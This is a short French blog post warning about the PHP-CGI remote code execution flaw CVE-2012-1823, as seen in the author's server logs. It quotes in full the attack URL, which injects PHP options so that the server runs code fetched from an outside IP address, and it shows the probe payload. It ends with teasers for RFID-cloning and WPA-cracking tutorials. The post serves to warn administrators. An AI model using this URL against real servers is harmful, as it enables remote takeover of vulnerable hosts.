php_logo.jpg

Une importante faille PHP semble occuper de nombreux robots et script kiddies.

Cette faille permet d'exécuter du code PHP à distance et de prendre la main sur un serveur Web très facilement. Voici l'URL que l'attaquant utilise pour détecter si votre serveur est vulnérable :

http://www.monserveur.com/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt

Cette URL est sollicité de nombreuses fois par jour sur mon serveur, je pense que de nombreux serveurs ont été infectés ;-(

En cas de vulnérabilité de votre serveur, l'appel de cette URL permet d'exécuter sur votre serveur du code PHP provenant d'un serveur Thailandais : http://61.19.253.26/echo.txt

<?php echo "dsfer34w5rlsidfosdedfpsd"; ?>

La faille a été découverte mi-mai touche heureusement que les serveurs avec PHP fonctionnant en mode CGI ou l'exécutable PHP est exécuté lors de la requête HTTP. Les serveurs utilisant des pool de CGI PHP de type Fast-cgi ou le mod_php classique d'Apache sont épargnés à ce type d'attaque.

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.

http://www.cvedetails.com/cve/CVE-2012-1823

Je vous invite à vérifier dès maintenant la version de votre installation PHP ;-)

  • Clone carte RFID Mifare

    Hacking : Comment cloner une carte RFID ?

    Les cartes RFID Mifare 1K possèdent deux protections principales : Le block 0 est en lecture seule, seul le constructeur de la carte peut initialiser ce block. Les données écrites sur les cartes sont encryptées. Il existe cependant des solutions pour outrepasser ces protections et permettre de créer des copies exactes. Cet article détaille la procédure pour cloner une carte RFID Mifare 1k sous Linux.

  • Tutoriel Backtrack 5 : Comment cracker un réseau Wifi protégé avec du WPA

    Voici un tutoriel intéressant sur les outils de bruteforce WPA mis à disposition dans la distribution Linux Backtrack 5.

Ajouter un commentaire

Le code HTML est affiché comme du texte et les adresses web sont automatiquement transformées.